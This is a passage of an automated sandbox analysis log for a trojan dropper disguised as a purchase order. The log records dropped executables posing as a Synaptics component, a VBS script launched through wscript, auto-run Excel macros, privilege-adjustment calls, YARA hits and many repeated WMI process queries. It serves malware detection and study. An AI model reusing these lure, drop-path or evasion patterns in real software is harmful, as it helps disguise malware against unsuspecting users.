                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA8CA01_2_00EA8CA0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ECAC831_2_00ECAC83
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBAD5C1_2_00EBAD5C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC0EC41_2_00EC0EC4
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ED4EBF1_2_00ED4EBF
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ED113E1_2_00ED113E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC12F91_2_00EC12F9
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ED542F1_2_00ED542F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F5D01_2_00F0F5D0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ED599F1_2_00ED599F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ECDA741_2_00ECDA74
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ECBDF61_2_00ECBDF6
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EABDF01_2_00EABDF0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA5D321_2_00EA5D32
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC1E5A1_2_00EC1E5A
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ED7FFD1_2_00ED7FFD
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEBFB81_2_00EEBFB8
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ECDF691_2_00ECDF69
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_2FC0D1BD2_2_2FC0D1BD
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_2FC0AD7D2_2_2FC0AD7D
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0007DCD09_2_0007DCD0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0007A0C09_2_0007A0C0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000901839_2_00090183
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000B220C9_2_000B220C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000785309_2_00078530
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000766709_2_00076670
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000906779_2_00090677
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000A87799_2_000A8779
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DA8DC9_2_000DA8DC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00090A8F9_2_00090A8F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00082B409_2_00082B40
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00076BBC9_2_00076BBC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0009AC839_2_0009AC83
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00078CA09_2_00078CA0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008AD5C9_2_0008AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000A4EBF9_2_000A4EBF
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00090EC49_2_00090EC4
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000D30AD9_2_000D30AD
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000A113E9_2_000A113E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000912F99_2_000912F9
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000A542F9_2_000A542F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF5D09_2_000DF5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000836809_2_00083680
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000A599F9_2_000A599F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0009DA749_2_0009DA74
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00075D329_2_00075D32
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0007BDF09_2_0007BDF0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0009BDF69_2_0009BDF6
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00091E5A9_2_00091E5A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0009DF699_2_0009DF69
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BBFB89_2_000BBFB8
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000A7FFD9_2_000A7FFD
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: String function: 00097750 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: String function: 0008F885 appears 67 times
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: String function: 00EBF885 appears 67 times
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: String function: 00EC7750 appears 42 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 23736
                                Source: New PO - Supplier 0202AW-PER2.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: New PO - Supplier 0202AW-PER2.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCX76FB.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681270793.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689890104.00000000007B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNames lpcR vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689890104.00000000007B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689890104.00000000007A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000002.1690265415.00000000007AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exeBinary or memory string: OriginalFileName vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exeBinary or memory string: OriginalFilenameb! vs New PO - Supplier 0202AW-PER2.exe
                                Source: New PO - Supplier 0202AW-PER2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@26/51@22/4
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EED712 GetLastError,FormatMessageW,1_2_00EED712
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EDB8B0 AdjustTokenPrivileges,CloseHandle,1_2_00EDB8B0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EDBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00EDBEC3
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000AB8B0 AdjustTokenPrivileges,CloseHandle,9_2_000AB8B0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000ABEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_000ABEC3
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_00EEEA85
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,1_2_00EE6F5B
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEEFCD CoInitialize,CoCreateInstance,CoUninitialize,1_2_00EEEFCD
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00EA31F2
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile created: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4076
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeFile created: C:\Users\user\AppData\Local\Temp\QHCPYO.vbsJump to behavior
                                Source: Yara matchFile source: New PO - Supplier 0202AW-PER2.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.New PO - Supplier 0202AW-PER2.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX76FB.tmp, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
